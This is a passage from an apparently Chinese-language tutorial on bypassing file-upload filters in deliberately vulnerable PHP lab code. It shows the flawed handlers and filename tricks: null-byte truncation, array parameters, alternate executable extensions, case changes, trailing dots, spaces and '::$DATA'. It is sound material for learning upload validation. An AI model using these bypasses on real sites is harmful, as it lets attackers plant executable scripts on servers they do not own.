<div class="tabs" id=""><ul class="nav-tabs"><li class="tab active"><button type="button" data-href="#-1">修改之前</button></li><li class="tab"><button type="button" data-href="#-2">修改之后</button></li></ul><div class="tab-contents"><div class="tab-item-content active" id="-1"><p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5ruya6vij31140ikn1b.jpg" alt="文件上传-00截断4.png"></p>
<p>在这里把<code>../upload/</code>改为<code>../upload/test.php</code></p>
<p>十六进制如下</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5somd3t9j310c05gjrj.jpg" alt="文件上传-00截断7.png"></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div><div class="tab-item-content" id="-2"><p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5smgnjrzj311e0gbae2.jpg" alt="文件上传-00截断6.png"></p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5smgkakhj3105055mxc.jpg" alt="文件上传-00截断5.png"></p>
<p>修改十六进制,添加一个00字节</p>
<p>然后上传</p>
<p>有时候也可以直接写成<code>../upload/test.php.jpg</code></p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5rjhb6igj30do0203yn.jpg" alt="文件上传-00截断3.png"></p>
<p>上传之后直接访问<code>/upload/test.php</code>即可</p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div></div></div>
<h5 id="截断绕过"><a href="#截断绕过" class="headerlink" title="截断绕过"></a>截断绕过</h5><p>截断绕过利用的都是文件名中不允许出现的某些字符:文件名会在这些字符处被截断</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">%<span class="number">00</span></span><br><span class="line"><span class="number">0</span>x00</span><br><span class="line">:</span><br><span class="line">;</span><br><span class="line"><span class="string">'</span></span><br><span class="line"><span class="string">"</span></span><br><span class="line"><span class="string">^</span></span><br></pre></td></tr></table></figure>
<h5 id="数组绕过"><a href="#数组绕过" class="headerlink" title="数组绕过"></a>数组绕过</h5><p>通过<code>$file_name = reset($file) . '.' . $file[count($file) - 1];</code><br>可以知道最终的文件名是由数组的第一个和最后一个元素拼接而成;如果上传的不是数组,代码会自己把它拆成数组,而直接传入数组则不会再拆分,这就提供了绕过条件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>])){</span><br><span class="line"> <span class="comment">//检查MIME</span></span><br><span class="line"> <span class="variable">$allow_type</span> = <span class="keyword">array</span>(<span class="string">'image/jpeg'</span>,<span class="string">'image/png'</span>,<span class="string">'image/gif'</span>);</span><br><span class="line"> <span class="keyword">if</span>(!in_array(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span 
class="string">'type'</span>],<span class="variable">$allow_type</span>)){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"禁止上传该类型文件!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//检查文件名</span></span><br><span class="line"> <span class="variable">$file</span> = <span class="keyword">empty</span>(<span class="variable">$_POST</span>[<span class="string">'save_name'</span>]) ? <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>] : <span class="variable">$_POST</span>[<span class="string">'save_name'</span>];</span><br><span class="line"> <span class="keyword">if</span> (!is_array(<span class="variable">$file</span>)) {</span><br><span class="line"> <span class="variable">$file</span> = explode(<span class="string">'.'</span>, strtolower(<span class="variable">$file</span>));</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ext</span> = end(<span class="variable">$file</span>);</span><br><span class="line"> <span class="variable">$allow_suffix</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$ext</span>, <span class="variable">$allow_suffix</span>)) {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"禁止上传该后缀文件!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$file_name</span> = reset(<span class="variable">$file</span>) . <span class="string">'.'</span> . 
<span class="variable">$file</span>[count(<span class="variable">$file</span>) - <span class="number">1</span>];</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span> .<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件上传成功!"</span>;</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件上传失败!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"请选择要上传的文件!"</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>上传php文件,抓包,修改以下内容</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq8rg3w13qj30lx09v0u7.jpg" alt="文件上传-数组.png"></p>
<p>最后上传的文件为<code>test.php</code>,直接访问即可</p>
<h4 id="黑名单"><a href="#黑名单" class="headerlink" title="黑名单"></a>黑名单</h4><h5 id="上传特殊可解析后缀"><a href="#上传特殊可解析后缀" class="headerlink" title="上传特殊可解析后缀"></a>上传特殊可解析后缀</h5><p>服务端进行黑名单验证,当上传的文件后缀是asp,aspx,php,jsp时,文件禁止上传</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">'.asp'</span>,<span class="string">'.aspx'</span>,<span class="string">'.php'</span>,<span class="string">'.jsp'</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span 
class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span 
class="variable">$msg</span> = <span class="string">'不允许上传.asp,.aspx,.php,.jsp后缀文件!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>一个语言的后缀不一定是唯一的,我们上传同类后缀也可以执行脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">PHP:php,php2,php3,php4,php5,phtml,pht</span><br><span class="line">ASP:asp,aspx,ascx,ashx,cer,asa,asmx</span><br><span class="line">JSP:jsp,jspx,jspf,jsw</span><br><span class="line">exe:exe,exee</span><br><span class="line">....</span><br></pre></td></tr></table></figure>
<h5 id="后缀大小写绕过"><a href="#后缀大小写绕过" class="headerlink" title="后缀大小写绕过"></a>后缀大小写绕过</h5><p>在语言中,后缀的大小写是不影响使用的,所以,即使后缀是PHP,Php等这样的后缀也被看作php执行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span 
class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span 
class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>我们发现,服务器对列表中所有可执行脚本类型的扩展名都禁止上传,包括.htaccess</p>
<p>但是并没有对扩展名的大小写进行限制</p>
<p>源码中少了这一句,此代码把所有上传文件的后缀改成小写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file_ext = strtolower($file_ext); //转换为小写</span><br></pre></td></tr></table></figure>
<p>这里我们通过修改文件扩展名的大小写进行绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">xxx.phP</span><br><span class="line">XXX.PhP</span><br><span class="line">XXX.pHP</span><br><span class="line">xxx.PHp</span><br></pre></td></tr></table></figure>
<h5 id="点绕过"><a href="#点绕过" class="headerlink" title="点绕过"></a>点绕过</h5><p>在Windows中文件后缀名末尾有点的会自动去掉点</p>
<p>例如“test.php.”,在Windows中会自动去掉末尾的点变成“test.php”</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span 
class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span 
class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>利用Windows的特性,以上代码中没有对点进行处理</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br></pre></td></tr></table></figure>
<p>这里我们把上传的文件后面加一个点即可绕过,例如<code>test.php.</code></p>
<h5 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h5><p>在Windows中文件后缀名末尾有空格会自动去掉</p>
<p>例如<code>test.php </code>,在Windows中会自动去掉末尾的空格变成<code>test.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span 
class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span 
class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件不允许上传'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>以上代码中没有对空格进行处理</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br></pre></td></tr></table></figure>
<p>这里我们构造文件名<code>test.php </code>,在最后添加一个空格即可绕过</p>
<h5 id="DATA绕过"><a href="#DATA绕过" class="headerlink" title="::$DATA绕过"></a>::$DATA绕过</h5><p>利用Windows+PHP的特性:如果在文件名后加上<code>::$DATA</code>,系统会把<code>::$DATA</code>之后的数据当成文件流处理,不会检测后缀名,且保留<code>::$DATA</code>之前的文件名,其目的就是绕过后缀名检查</p>
<p>例如:<code>"test.php::$DATA"</code>Windows会自动去掉末尾的<code>::$DATA</code>变成<code>"test.php"</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span 
